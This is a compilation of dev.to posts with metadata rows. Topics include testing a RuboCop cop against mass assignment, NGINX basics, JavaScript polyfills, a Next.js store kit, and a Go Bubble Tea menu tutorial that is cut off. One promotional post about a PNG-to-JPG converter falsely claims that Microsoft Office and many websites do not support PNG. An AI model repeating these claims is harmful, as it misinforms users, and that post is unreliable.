Let's explore this with an example to show how testing could be done.
## Testing custom cops
On the Aha! engineering team, every model has an `account_id` attribute, and for [security reasons][security] we never want it to be set via mass assignment. To enforce this, we want to prevent certain attributes from being added to [attr_accessible][attr_accessible].
[attr_accessible]: https://apidock.com/rails/ActiveRecord/Base/attr_accessible/class
[security]: https://brakemanscanner.org/docs/warning_types/mass_assignment/
```ruby
# bad
class Foo
attr_accessible :name, :account_id
end
Foo.create(account_id: 1, name: "foo")
# good
class Foo
attr_accessible :name
end
foo = Foo.new(name: "foo")
foo.account_id = 1
foo.save
```
We have a custom cop that analyzes the arguments to that method and will error if any protected attribute is present. The custom cop we have ends up looking something like this:
```ruby
class RuboCop::Cop::ProtectedAttrAccessibleFields < RuboCop::Cop::Cop
# We can define a list of attributes we want to protect
PROTECTED_ATTRIBUTES = [
:account_id,
].freeze
# We can define an error message that is displayed when an offense is detected.
# This can be helpful to communicate information back to other engineers
ERROR_MESSAGE = <<~ERROR.freeze
Only permit attributes that are safe to be completely user controlled. Typically any *_id field could be problematic.
Instead perform direct assignment of the field after doing a scoped lookup. This is the safest way to handle user input.
Some fields such as #{PROTECTED_ATTRIBUTES.inspect} should never be used as part of attr_accessible.
ERROR
# We want to examine method calls. Particularly those that are calling the attr_accessible method
# and also have arguments we care about
def on_send(node)
if receiver_attr_accessible?(node) && protected_arguments?(node)
# If we do detect an attr_accessible call with arguments we care about, we can record an offense
add_offense(node, message: ERROR_MESSAGE)
end
end
private
def receiver_attr_accessible?(node)
node.method_name == :attr_accessible
end
def protected_arguments?(node)
node.arguments.any? do |argument|
if argument.sym_type? || argument.str_type?
PROTECTED_ATTRIBUTES.include?(argument.value.to_sym)
end
end
end
end
```
This custom cop does the trick. Adding a test for it ensures that it won't break in the future when we update RuboCop or extend the functionality. In order to write a test, we need to understand how the custom cops are set up and run.
## Instantiate a custom cop
`RuboCop::Cop::Cop` inherits from `RuboCop::Cop::Base` and that allows the instantiation without [any arguments](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/base.rb#L71). So it turns out this isn't anything special — creating a new instance of our cop is really as simple as: `RuboCop::Cop::ProtectedAttrAccessibleFields.new`
If the cop requires some kind of configuration, it can be passed to the instance via a `RuboCop::Config` object. The `RuboCop::Config` takes two arguments. RuboCop can [provide configuration](https://docs.rubocop.org/rubocop/configuration.html) via YML files. You can use the first argument of `RuboCop::Config` to pass this configuration with various values from the test. The second argument is the path of the loaded YML file, which can be ignored in the tests.
```ruby
config = RuboCop::Config.new({ RuboCop::Cop::ProtectedAttrAccessibleFields.badge.to_s => {} }, "/")
cop = RuboCop::Cop::ProtectedAttrAccessibleFields.new(config)
```
## Process, execute, examine
As it turns out, there is a [method](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/base.rb#L238) available, `RuboCop::Cop::Base#parse` , that accepts a string as input and will return something the cop can process.
This allows us to have something like:
```ruby
source = <<~CODE
attr_accessible :account_id
CODE
processed_source = cop.parse(source)
```
There is a class from within RuboCop, `RuboCop::Cop::Commissioner` , that is responsible for taking a [list of cops](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/commissioner.rb#L44) and using those to [investigate](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/commissioner.rb#L79) the processed source code. In order to run our cop, we can run this method.
```ruby
commissioner = RuboCop::Cop::Commissioner.new([cop])
investigation_report = commissioner.investigate(processed_source)
```
The `RuboCop::Cop::Commissioner#investigate` method will return an instance of [RuboCop::Cop::Commissioner::InvestigationReport](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/commissioner.rb#L18) which is a simple struct class that has a list of offenses that have been recorded.
## Put it all together
We end up with a test file that looks something like this:
```ruby
describe RuboCop::Cop::ProtectedAttrAccessibleFields do
let(:config) { RuboCop::Config.new({ described_class.badge.to_s => {} }, "/") }
let(:cop) { described_class.new(config) }
let(:commissioner) { RuboCop::Cop::Commissioner.new([cop]) }
it "records an offense if we use allow account_id as a string" do
source = <<~CODE
attr_accessible :foo, 'account_id'
CODE
investigation_report = commissioner.investigate(cop.parse(source))
expect(investigation_report.offenses).to_not be_blank
expect(investigation_report.offenses.first.message).to eql described_class::ERROR_MESSAGE
end
it "records an offense if we use allow account_id as symbol" do
source = <<~CODE
attr_accessible :foo, :account_id
CODE
investigation_report = commissioner.investigate(cop.parse(source))
expect(investigation_report.offenses).to_not be_blank
expect(investigation_report.offenses.first.message).to eql described_class::ERROR_MESSAGE
end
it "doesn't record an offense if no protected attribute is used" do
source = <<~CODE
attr_accessible :foo
CODE
investigation_report = commissioner.investigate(cop.parse(source))
expect(investigation_report.offenses).to be_blank
end
end
```
Now that we know how to write tests, we can use them as a starting point for building new cops, extending existing ones, and ensuring that things continue to function as our application grows and evolves. These little investments into [project-specific cops](https://evilmartians.com/chronicles/custom-cops-for-rubocop-an-emergency-service-for-your-codebase) can pay large dividends for the future health of your projects.
**Sign up for a free trial of Aha! Develop**
Aha! Develop is a fully extendable agile development tool. Prioritize the backlog, estimate work, and plan sprints. If you are interested in an integrated [product development](https://www.aha.io/suite-overview) approach, use [Aha! Roadmaps and Aha! Develop together](https://www.aha.io/product/integrations/develop). Sign up for a [free 30-day trial](https://www.aha.io/trial) or [join a live demo](https://www.aha.io/live-demo) to see why more than 5,000 companies trust our software to build lovable products and be happy doing it. | doliveirakn |
1,275,327 | Free Online PNG to JPG Converters You Can Trust | The PNG file format is great for storing images with transparent backgrounds because it produces... | 0 | 2022-11-28T08:47:57 | https://dev.to/swangden/free-online-png-to-jpg-converters-you-can-trust-3jce | pngtojpg, png, jpg, onlineconverte | The PNG file format is great for storing images with transparent backgrounds while keeping image quality high. However, not every program or website supports the PNG format, so if you want to insert a PNG file into another document or build an HTML page, you may need an online PNG to JPG converter. Luckily, we have a great option for you! Read on for more information about the best free online PNG to JPG converters and how they can help you with your projects.
## Free PNG to JPG converters
Toolsable is a website equipped with a wide variety of free online tools including a [PNG to JPG converter](https://www.toolsable.com/en/png-to-jpg) that converts PNG files into JPG. If you have a PNG file that you need to insert into a Microsoft Word document or upload to a website, you will have to convert the file to JPG first, since those programs and websites don’t support the PNG image format. Converting your PNG files to JPG is quite easy and only takes a few seconds.
You can do this either by opening the PNG file in a photo-editing program like Photoshop and then saving it as a JPG, or you can use a [free online PNG to JPG converter](https://www.toolsable.com/en/png-to-jpg). There are several of these online converters available, with the main differences being the quality of the converted images and the number of options you have for customizing the conversion process.
## Why should you convert your PNG files to JPG?
The PNG file format is great for storing images with transparent backgrounds while keeping image quality high. However, not every program or website supports the PNG format, so if you want to insert a PNG file into another document or build an HTML page, you may need to convert it to the JPG format first.
There are a few different reasons why you might want to convert your PNG files to JPG. The most common reason is to insert the PNG file into another document or website. This is especially true if you are working in a field that requires you to use Microsoft Office programs a lot since those don’t support the PNG format.
If you want to insert an image into an Office document or website without having to save it as a different file type first, you need to convert it from a PNG to JPG first. Another reason you may want to convert your PNG files to JPG is to make a smaller file. PNG files are great for storing high-quality images with transparent backgrounds, but they produce larger file sizes than JPG images.
## How to convert PNG images to JPG?
If you have a PNG file and want to convert it to JPG, you can do so using the online PNG to JPG converter on Toolsable. There are many different [PNG to JPG converters available online](https://www.toolsable.com/en/png-to-jpg), but not all of them are free. A web-based tool like Toolsable also saves you the hassle of downloading and installing a program on your computer.
There are several key differences between free and paid PNG to JPG converters. First, most free converters let you select the image quality of the JPG file that is created.
You can also control how much the image is compressed, which affects the image quality. Paid PNG to JPG converters usually don’t give you any control over these settings, so the quality of the converted files may not be as high. Another important difference between free and paid PNG to JPG converters is the number of options you have for customizing the conversion process.
Many free converters have a very basic user interface and don’t give you many options for adjusting the conversion process. Paid converters are often more flexible and let you customize the conversion settings.
## Recommend a free online PNG to JPG converter.
There are many [free PNG to JPG converters](https://www.toolsable.com/en/png-to-jpg) available online, but many of them have very limited functionality. If you are looking for a PNG to JPG converter that gives you more control over the conversion process and lets you choose the quality setting for the JPG files you create, you can use Toolsable.
Toolsable has one of the most popular free PNG to JPG converters available online. It has an easy-to-use interface and provides several different conversion options, including resizing the images before converting them. Toolsable also lets you choose the quality setting for the JPG files and offers an option to compress them further to reduce the file size.
## Conclusion
A PNG to JPG converter is a program or website that converts PNG files into JPG. If you have a PNG file that you need to insert into a document or website, you will have to convert the file to JPG first, since those programs and sites don’t support the PNG format.
You can do this either by opening the PNG file in a photo-editing program like Photoshop and then saving it as a JPG, or you can use a free online PNG to JPG converter like toolsable.
There are several of these online converters available, with the main differences being the quality of the converted images and the number of options you have for customizing the conversion process. | swangden |
1,226,573 | Um pouco sobre o NGINX pt.1 | O NGINX (Engine X) é um Software Open Source que tem como funcionalidade principal atender... | 0 | 2022-10-24T15:34:51 | https://dev.to/juannunesz/um-pouco-sobre-o-nginx-pt1-3c6l | nginx, devops, cahce, webdev |

**NGINX** (Engine X) is open-source software whose main purpose is serving HTTP requests on the web.
But that is not all it does; it is no accident that it is the most used web server on the internet. Besides serving HTTP requests exceptionally well, it offers a series of features that make it more and more interesting: reverse proxying, caching, load balancing, media streaming, and it is often used as a proxy server for e-mail (IMAP, POP3, and SMTP). Further on, I talk a bit about each of these NGINX features and the contexts in which they are most used.
## The story behind it
NGINX was originally written to solve the difficulty existing web servers faced in handling large numbers (the famous 10K) of simultaneous connections.
In 2004, after seeing its usage grow exponentially, its creator Igor Sysoev decided to open-source the project and founded NGINX, Inc. to support NGINX's continued development and to commercialize NGINX Plus as a product for enterprise customers.
## Differences between Apache and NGINX
NGINX has outperformed Apache and some other servers in benchmarks that measure web server performance ever since its release. Websites, however, have evolved from static HTML pages to dynamic content. NGINX grew along with that evolution and now supports all the components of the "modern" web, including WebSocket, HTTP/2, gRPC, and streaming in several video formats (HDS, HLS, and others).
Beyond NGINX's high configurability and support for modern web components, what explains its performance advantage over Apache is its architecture, which dictates how the web server handles its requests. Apache is a process-based server, in which each connection request is handled by a single process. The way it generally works is that a parent server process receives connection requests and, when one arrives, it creates (spawns) a child process to handle it. When another request comes in, the parent process spawns a new child process for it, and so on.
However, all of this comes at an enormous processing cost, because the more requests and open connections there are, the more computing resources are spent.
NGINX, on the other hand, has a different kind of architecture: an asynchronous, event-driven one.

This means similar threads are managed by a worker process, and each worker process contains smaller units called worker connections. This whole unit is responsible for handling requests. Worker connections carry requests to a worker process, which in turn sends them to the master process. Finally, the master process delivers the result of the request.
Put simply: there is one main worker and several smaller workers receiving requests, but each worker is asynchronous and capable of handling more than one request. So while it is returning a static CSS file, the same worker is already serving a new request, and so on.

One detail: workers are usually created according to the number of CPU cores, but this can be set in the NGINX configuration file.
If you have just installed NGINX, it will look like this:
```
worker_processes auto;
```
This way, it is configured to create workers according to the number of CPU cores.
A single worker is able to "handle" up to 1,024 simultaneous connections.
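Both settings live in `nginx.conf`. A minimal sketch combining the worker count with the per-worker connection limit:

```
worker_processes auto;

events {
    # each worker can keep up to this many simultaneous connections open
    worker_connections 1024;
}
```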
## Reverse Proxy
When people talk about NGINX, the famous reverse proxy always comes up. But what exactly is it?
I confess that when it was first explained to me, I spent a good two minutes staring blankly, trying to understand.
Well, to understand the reverse proxy we first need to clarify the concept of a proxy. A proxy is a server that acts as an intermediary between the user and the internet, receiving requests and passing them along. It is commonly used inside companies to block access to websites and other content.
With that definition in hand, we can say a reverse proxy is an intermediary server that sits on the server side, not the client side, receiving requests and redirecting them to the correct servers/services.

A very simple example:
```
server {
    listen 80;
    server_name localhost;

    location / {
        root /users/juan/dev/nginx;
        index index.html;
    }

    location ~ \.php$ {
        proxy_pass http://localhost:8000;
    }
}
```
- **server** - a block designated for the configuration of one server inside your config file. You can have several of them, each one listening on a different port. You can expose one server to the world and keep another one internal, without caching, or even bypassing authentication, for example.
- **listen** - here you define which port your server will accept connections on.
- **location** - the directive used to define routes. Locations are quite powerful: they accept regular expressions, and it is possible to capture variables and use them in the configuration. The location system also supports different match types:
- With no modifier, the match is done against the beginning of the URI.
- *=* is an exact match.
- *~* is a regular-expression match.
In this case, NGINX was configured to redirect every request involving PHP to a specific service, which runs the logic and processes the information. If the request is for a static file, such as an HTML page, the server promptly returns it without sending a request to the PHP server, making the whole process more dynamic.
# Load Balancing
Most of the time, a production application has more than one server behind it, because servers have finite resources (CPU, disk, etc.) for serving multiple requests. And it is not only about that: what if a server suffers a hardware failure? Or some network failure? Countless reasons can leave your application without a fallback for those cases.
In these cases we use an **upstream** block, where we declare the servers the application is balanced across.
```
upstream servicos {
server localhost:8001;
server localhost:8002;
}
server {
listen 8080;
server_name localhost;
location / {
proxy_pass http://servicos;
}
}
```
Since we have not configured a specific balancing algorithm (round robin is the default; others include IP hash, etc.), our server simply alternates requests between the services: 50% of requests go to localhost:8001 and 50% to localhost:8002.
This is a basic example, but it can be explored in many ways to mitigate the risk of having your application go down.
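If you want something other than an even split, relative weights can be declared on the same upstream block (illustrative values; NGINX also offers other balancing methods such as `least_conn` and `ip_hash`):

```
upstream servicos {
    # with the default round-robin method, weight=3 shifts the split to roughly 3:1
    server localhost:8001 weight=3;
    server localhost:8002;
}
```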
# Final Thoughts
The goal of this post is just to give a quick overview of the fastest web server on the market and show some of the characteristics that earned it that title. In the next post we will have applied examples, and I will show some other features such as caching, streaming, and more.
| juannunesz |
1,226,828 | JS Polyfills - Part 2 (forEach, keys, Values, Entries) | Github Code: JS Polyfills 4. forEach() Function: forEach(callback, thisArg) Usage:... | 0 | 2022-10-22T09:19:01 | https://dev.to/uttarasriya/js-polyfills-part-2-307d | javascript, webdev, jsitor, jspolyfill | <link rel="canonical" href="https://dev.to/uttarasriya/js-polyfills-part-2-307d"/>
**Github Code:** [JS Polyfills](https://github.com/uttara-sriya/JS-Polyfills)
**4. forEach()**
- <u>Function</u>: `forEach(callback, thisArg)`
- <u>Usage</u>: `arr.forEach((ele, index, arr)=>{...}, this)`
- <u>Description</u>: the callback function executes on every element, but not on uninitialized elements of sparse arrays.
- <u>Polyfill</u>: [forEach](https://jsitor.com/C42UCNGj9)
```javascript
//function returns undefined
Array.prototype.customForEach = function (callback) {
//this should point to array
if(Array.isArray(this)) {
for (let i = 0; i < this.length; i++) {
//check if each element exists
if(typeof this[i] !== 'undefined') {
//callback will take element, index and array as parameters
callback(this[i], i, this);
}
}
}
};
```
**5. Keys()**
- <u>Function</u>: `keys()`
- <u>Usage</u>: `arr.keys()`
- <u>Description</u>: returns an array iterator over the keys (indices)
- <u>Polyfill</u>:[Keys](https://jsitor.com/uvUwSV8D1)
```javascript
//function returns Array Iterator
Array.prototype.customKeys = function () {
let keys = [];
for (let i = 0; i < this.length; i++) {
keys.push(i);
}
// A generator function which returns a generator object( basically follows iterator protocol)
// Why we use here? because the keys return array iterator
// A yield will pause and resume the function (Basically will return the keys one by one until done becomes true)
function* iterator() {
yield* keys;
}
return iterator();
};
```
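The generator mechanics the comments refer to can be seen in isolation: `yield*` delegates to an iterable, and each `next()` call resumes the function until `done` becomes `true`. A standalone sketch, independent of the polyfill:

```javascript
function* iterate(items) {
  // yield* hands out each element of the iterable, one per next() call
  yield* items;
}

const it = iterate([10, 20]);
console.log(it.next()); // { value: 10, done: false }
console.log(it.next()); // { value: 20, done: false }
console.log(it.next()); // { value: undefined, done: true }
```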
**6. Values()**
- <u>Function</u>: `values()`
- <u>Usage</u>: `arr.values()`
- <u>Description</u>: returns an array iterator over the values
- <u>Polyfill</u>:[Values](https://jsitor.com/kU-55C-wc)
```javascript
//function returns Array Iterator
Array.prototype.customValues = function () {
let values = [];
for (let i = 0; i < this.length; i++) {
values.push(this[i]);
}
// A generator function which returns a generator object( basically follows iterator protocol)
// Why we use here? because the values return array iterator
// A yield will pause and resume the function (Basically will return the values one by one until done becomes true)
function* iterator() {
yield* values;
}
return iterator();
};
```
**7. Entries()**
- <u>Function</u>: `entries()`
- <u>Usage</u>: `arr.entries()`
- <u>Description</u>: returns an array iterator over `[index, value]` pairs
- <u>Polyfill</u>:[Entries](https://jsitor.com/S865hAWaa)
```javascript
//function returns Array Iterator
Array.prototype.customEntries = function () {
let entries = [];
for (let i = 0; i < this.length; i++) {
entries.push([i, this[i]]);
}
// A generator function which returns a generator object( basically follows iterator protocol)
// Why we use here? because the entries return array iterator
// A yield will pause and resume the function (Basically will return the entries one by one until done becomes true)
function* iterator() {
yield* entries;
}
return iterator();
};
```
Stay Tuned for Part 3
Keep Learning! | uttarasriya |
1,226,934 | What is the proper length for a podcast? | Podcasts come in a variety of sizes and forms. Podcasts range in length from a minute to several... | 0 | 2022-10-22T11:48:32 | https://dev.to/krishnalal7/what-is-the-proper-length-for-a-podcast-5fmf | podcast |
Podcasts come in a variety of sizes and forms.
Podcasts range in length from a minute to several hours. So, the major question is, what kind of stuff are you going to record?
If your episodes are suitable for bite-sized content, strive for 5 to 10 minutes.
If you wish to speak with a co-host, decide how long each chat will be (and make sure you have something to say, not just meandering gibberish) and keep to that time limit.
Are you putting together a story episode? Many story-based podcasts are around an hour long.
Long-form interviews and in-depth analyses? There are several that last more than an hour - up to 3-4 hours.
What is important is that you have something to say.
Turning on the microphone and making it up as you go is a recipe for disaster.
"Be On, Be Good, Be Gone," my employer pounded into my head early in my radio career.
Be On
Meaning: Be ready to speak up and be intriguing. Have a clear goal in mind and be prepared to deal with anything unexpected that may arise.
Be Good
Meaning: When you open the microphone, your audience expects you to present them with something enjoyable, thrilling, amusing, motivating, or informative that will keep them listening. You must deliver.
Be Gone
Meaning: Do not overstay your welcome. When you've completed your mission, get out of dodge.
"Take as much time you need, but be as brief as you can," radio coach Tommy Kramer adds.
Understand Your Audience
As you develop your episodes, you will discover what your audience appreciates and expects from you based on how they react to your content.
Make sure you're surveying your audience, allowing them to contact you via email, and creating a community with your new listeners. It also allows you to ask them questions.
This is the most effective method for determining how to improve and change the length of your episodes.
Listen to the #1 [Malayalam Podcast](https://www.themalayali.in/) from Kerala | krishnalal7 |
1,227,020 | Next.js E-commerce StarterKit (2022) | Intro Creating an e-commerce website might look like a simple task, but in fact, it is a... | 0 | 2022-10-22T15:59:58 | https://dev.to/kirillzhirnov/nextjs-e-commerce-starterkit-2022-6ha | ecommerce, nextjs, starterkit, tutorial | ## Intro
Creating an e-commerce website might look like a simple task, but in fact it is a pretty complicated one: you need to find a backend and an API, organize product listings on the frontend, and build a catalog with hierarchy, filters, and search, plus a cart and a checkout. And don't forget about image resizing. All of these parts should be done in a modern way, e.g. with Next.js and SSG.
## The solution
Ready to use Next.JS E-Commerce Starter kit!
https://github.com/kirill-zhirnov/boundless-nextjs-sample
Demo: https://blank.demos.my-boundless.app/
There are two ready-to-use themes:
https://github.com/kirill-zhirnov/boundless-marsfull-theme/
Demo: https://mars.demos.my-boundless.app/
https://github.com/kirill-zhirnov/boundless-moon-theme
Demo: https://moon.demos.my-boundless.app
The checkout is a standalone component, which can be easily customized: https://github.com/kirill-zhirnov/boundless-checkout-react
Themes use BoundlessCommerce (https://boundless-commerce.com) as a backend. There is a completely free plan that covers small-business needs.
These Next.js sites can be easily deployed to Vercel or Netlify. If you want a long read about creating a Next.js e-commerce website, please visit our blog (I don't want to do a copy/paste :)): https://boundless-commerce.com/blog/how-to-create-a-nextjs-e-commerce-website
And if you have any questions, please contact us; we are happy to help!
| kirillzhirnov |
1,227,087 | Simple Password Generator | Here is a simple python generator that use the "Random" module with a random.sample() method. The... | 0 | 2022-10-22T16:30:16 | https://dev.to/sngvfx/simple-password-generator-591m | generator, python | Here is a simple Python generator that uses the `random` module's `random.sample()` method. The generated password is a combination of upper- and lowercase letters, numbers, and symbols. To make the password more complex and harder to crack, its length has been set to 20.
Give it a try, feel free to improve it, and let me know!
 | sngvfx |
1,227,355 | Awesome way to convert every type to Boolean on JavaScript | Compare between two variables on JavaScript maybe the thing that every developer has done on their... | 0 | 2022-10-23T03:04:35 | https://dev.to/junedang/awesome-way-to-convert-every-type-to-boolean-on-javascript-11ip | javascript, webdev | Compare between two variables on JavaScript maybe the thing that every developer has done on their daily work but there is a cool and faster way that you can impress your colleague on doing convert variable to Boolean.
## Reverse logical
We are all see the used of reverse logical logic (!) in all of our code base. In JavaScript, this symbol will convert every type into Boolean and then reverse the logic of its operation.
## What happen if you use “!!”?
This is tricky now! As I said earlier, JavaScript will cast every operation into Boolean when we attach it with “!” symbol. And when we attach another “!” logical expression here, we are doing the reverse of reverse of the logical operation thus we converting variable into Boolean type without changing variable context.
Some examples when we only use one “!” logical expression:
```JavaScript
!'' // true
!{} // false
!0 // true
!1 // false
![] // false
!undefined // true
!null // true
```
As you can see in the code above, the values were converted to Booleans and their truthiness was inverted.
And here is what happens when we use two “!” operators:
```JavaScript
!!'' // false
!!{} // true
!!0 // false
!!1 // true
!![] // true
!!undefined // false
!!null // false
```
You can see that the values were converted to Booleans without inverting their truthiness, so we have successfully converted each value to a Boolean while keeping its logic intact.
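In other words, `!!value` is shorthand for an explicit cast. We can check that it agrees with the built-in `Boolean()` function for every value used above:

```javascript
const samples = ['', {}, 0, 1, [], undefined, null];

for (const value of samples) {
  // double negation and an explicit cast always agree
  console.log(!!value === Boolean(value)); // true for every sample
}
```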
Thank you for reading and see you in other articles. | junedang |
1,227,815 | Consider Anti-corruption Layer when integrate with another system | Motivation You may be worked on projects that deal with third party APIs (APIs related to... | 0 | 2022-10-23T20:16:04 | https://dev.to/smuhammed/consider-anti-corruption-layer-when-integrate-with-another-system-2c55 | programming, bestpractice, adapter, integration | ## Motivation
You may have worked on projects that deal with third-party APIs (APIs belonging to another service provider), with libraries produced by other companies, or on a new system that must talk to a legacy system. When you use these APIs, you have to handle them specially in order to keep your code clean and maintainable.
## The main problem is different languages
Usually, the external APIs you deal with are built in a different language from your system's. By different language I don't mean a programming language; I mean a domain language: different objects and properties from those used in your system.
If you start using this language (objects and properties) directly in the middle of your domain business logic, you will find yourself doing explicit conversions between your system's objects and the third party's objects, handling exceptions thrown by the library, or handling HTTP request failures right inside your business logic. Even if your functionality is small or trivial, using a third-party API this way makes it more complex to read and maintain.
## Meet Anti-Corruption Layer
The Anti-corruption Layer is one of the DDD (Domain Driven Design) principles. The name comes from preventing the corruption of your business logic that integration code can cause. It tells you that if you deal with any third party API, you should isolate the integration code in a separate layer, and any service in your system that needs this API should use it through a contract/interface.
Let's take an example. Suppose you have a Social Insurance System and want to integrate with a third party that provides **citizen information** based on a **national id**. Your system has an Insurer class that belongs to your domain, like this:
```java
class Insurer {
    private String firstName;
    private String lastName;
    private String nationalId;
    private Integer age;
    // getters and setters
}
```
And the third party's response will look like this:

```java
class Citizen {
    private String fullName;
    private String id;
    private Date dateOfBirth;
    // getters and setters
}
```
It's obvious that these are two different classes and a conversion is needed. **So what will our anti-corruption layer look like?**

**First, we build the contract/interface:**

```java
public interface CitizenSystemIntegration {
    public Insurer getInsurer(String nationalId);
}
```
**And our contract implementation service will look like:**

```java
class CitizenSystemIntegrationImpl implements CitizenSystemIntegration {
    @Override
    public Insurer getInsurer(String nationalId) {
        // build request object
        // call third party api
        // convert response to Insurer object
        return null; // placeholder so the sketch compiles
    }
}
```
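As a hedged sketch of what the conversion step inside that implementation might look like (the field mapping, the name-splitting rule, and the age calculation below are all assumptions for illustration; a real adapter would also build the request, perform the HTTP call, and handle failures):

```java
import java.time.LocalDate;
import java.time.Period;

// Assumed shapes for illustration, mirroring the article's two classes
class Citizen {
    String fullName;
    String id;
    LocalDate dateOfBirth;

    Citizen(String fullName, String id, LocalDate dateOfBirth) {
        this.fullName = fullName;
        this.id = id;
        this.dateOfBirth = dateOfBirth;
    }
}

class Insurer {
    String firstName;
    String lastName;
    String nationalId;
    Integer age;
}

class CitizenConverter {
    // Map the third party's Citizen onto our domain's Insurer
    static Insurer toInsurer(Citizen citizen) {
        Insurer insurer = new Insurer();
        // Naive split: assumes fullName is "firstName lastName"
        String[] parts = citizen.fullName.split(" ", 2);
        insurer.firstName = parts[0];
        insurer.lastName = parts.length > 1 ? parts[1] : "";
        insurer.nationalId = citizen.id;
        insurer.age = Period.between(citizen.dateOfBirth, LocalDate.now()).getYears();
        return insurer;
    }
}
```

Keeping this mapping inside the adapter means the rest of the domain only ever sees `Insurer`.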
Now, whenever you need this facility, you can create an object from this implementation and use it. Below are the benefits of this strategy:
- Isolating the integration code.
- Reducing code duplication, as we have one place to edit and maintain.
- You can build your exception handling logic in one place.
- Your main system functionality stays clear: there are no foreign objects to handle, no API-specific exceptions to deal with, and your domain service remains clean.
- You can add logging functionality
In the end, the Anti-corruption Layer is built on the same concept as the Adapter design pattern:

## Resources
- [Adapter Pattern](https://refactoring.guru/design-patterns/adapter)
- [Anti-Corruption Layer](https://www.thereformedprogrammer.net/wrapping-your-business-logic-with-anti-corruption-layers-net-core/)
IF YOU LIKED THE POST, THEN YOU CAN SUPPPORT SUCH CONTENT WITH A CUP OF COFFEE, THANKS IN ADVANCE.
<a href="https://www.buymeacoffee.com/samehmuh95" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a> | smuhammed |
1,227,837 | Processing user input in Bubble Tea with a menu component | In the last tutorial, we did a "hello world" app, and it processed just a bit of user input ("press... | 20,227 | 2022-10-23T21:25:24 | https://dev.to/andyhaskell/processing-user-input-in-bubble-tea-with-a-menu-component-222i | go, codenewbie, 100devs, tui | ---
title: Processing user input in Bubble Tea with a menu component
published: true
description:
tags: #go, #codenewbie, #100devs, #tui
series: Make slick command-line apps with Bubble Tea
---
In the last tutorial, we did a "hello world" app, and it processed just a bit of user input ("press Ctrl+C to exit").
But we didn't really get a feel for actually using user input to change the model's data, and in turn change what we see in the app. So in this tutorial, we're going to create a menu component that lets us move between buttons.
## 📝 Defining our data
The first thing we need for any Bubble Tea component is the data our model is in charge of. If you recall, in our simplePage model, the data was just the text we were displaying:
```go
type simplePage struct { text string }
```
In our menu, what we need to do is:
* Display our options
* Show which option is selected
* Additionally, let the user press enter to go to another page. But we'll add that in a later tutorial.
* For now, we can still pass in an onPress function that tells us what to do if the user presses enter.
So our model's data will look like this; if you're following along, write this in a file named `menu.go`.
```go
type menu struct {
options []menuItem
selectedIndex int
}
type menuItem struct {
text string
onPress func() tea.Msg
}
```
A menu is made up of menuItems, and each menuItem has text and a function handling pressing enter. In this tutorial we'll just have the app toggle between all-caps and all-lowercase so it's at least doing something.
It returns a `tea.Msg` because that's how we're able to change the data in response to this user input. We'll see why in the next section, when we're implementing the `Model` interface.
## 🧋 Implementing the Model interface
If you recall, for us to use our model as a UI component, it needs to implement this interface:
```go
type Model interface {
Init() Cmd
Update(msg Msg) (Model, Cmd)
View() string
}
```
First let's write the Init function.
```go
func (m menu) Init() tea.Cmd { return nil }
```
Again, we still don't have any initial `Cmd` we need to run, so we can just return `nil`.
For the `View` function, let's make an old-school menu with an arrow to tell us which item is currently selected.
```go
func (m menu) View() string {
var options []string
for i, o := range m.options {
if i == m.selectedIndex {
options = append(options, fmt.Sprintf("-> %s", o.text))
} else {
options = append(options, fmt.Sprintf(" %s", o.text))
}
}
return fmt.Sprintf(`%s
Press enter/return to select a list item, arrow keys to move, or Ctrl+C to exit.`,
strings.Join(options, "\n"))
}
```
As mentioned in the last tutorial, one of the things that makes Bubble Tea really learnable is that the display for your UI is basically one big string. So in `menu.View` we make a slice of strings where the selected option has an arrow and the non-selected options have leading spaces. Then we join them all together and add our controls to the bottom.
Finally, let's write our Update method to handle user input.
```go
func (m menu) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg.(type) {
case tea.KeyMsg:
switch msg.(tea.KeyMsg).String() {
case "ctrl+c":
return m, tea.Quit
case "down", "right", "up", "left":
return m.moveCursor(msg.(tea.KeyMsg)), nil
}
}
return m, nil
}
func (m menu) moveCursor(msg tea.KeyMsg) menu {
switch msg.String() {
case "up", "left":
m.selectedIndex--
case "down", "right":
m.selectedIndex++
default:
// do nothing
}
optCount := len(m.options)
m.selectedIndex = (m.selectedIndex + optCount) % optCount
return m
}
```
The `Update` method is the most complex part of this app, so let's break that down.
```go
case "ctrl+c":
return m, tea.Quit
```
Like before, we're handling the `KeyMsg` type, and we handle the Ctrl+C keypress to quit the app by returning the Quit cmd.
```go
case "down", "right", "up", "left":
return m.moveCursor(msg.(tea.KeyMsg)), nil
```
For the arrow keys, though, we use a helper function, `moveCursor`, which returns an updated model.
```go
func (m menu) moveCursor(msg tea.KeyMsg) menu {
switch msg.String() {
case "up", "left":
m.selectedIndex--
case "down", "right":
m.selectedIndex++
default:
// do nothing
}
optCount := len(m.options)
m.selectedIndex = (m.selectedIndex + optCount) % optCount
return m
}
```
The up and left KeyMsg strings serve as our "navigate up" keys, and the down and right ones navigate us down, decrementing and incrementing `m.selectedIndex`.
Then, we use the mod operator to ensure that `m.selectedIndex` is one of the indices of our options.
Finally, with the model updated, `moveCursor` returns the model that in turn is returned by `Update`, and the new model ultimately gets processed by our `View` method.
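To see why we add `optCount` before taking the modulus, here's a small standalone sketch (the `wrapIndex` helper is ours for illustration, not part of the app). In Go, `%` can return a negative result, so `-1 % 3` is `-1`, while `(-1 + 3) % 3` wraps cleanly to `2`:

```go
package main

import "fmt"

// wrapIndex is an illustrative helper, not part of the app: it shows why
// we add the length before taking the modulus. Go's % operator can return
// a negative result for a negative left operand, so adding n first keeps
// the result inside [0, n) for a single step up or down.
func wrapIndex(i, n int) int {
	return (i + n) % n
}

func main() {
	fmt.Println(wrapIndex(-1, 3)) // 2: moving up from the first item wraps to the last
	fmt.Println(wrapIndex(3, 3))  // 0: moving down from the last item wraps to the first
}
```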
Before we move on to processing the enter key though, we should see our app run. So let's put our new `menu` component into a `main` function and run it.
```go
func main() {
m := menu{
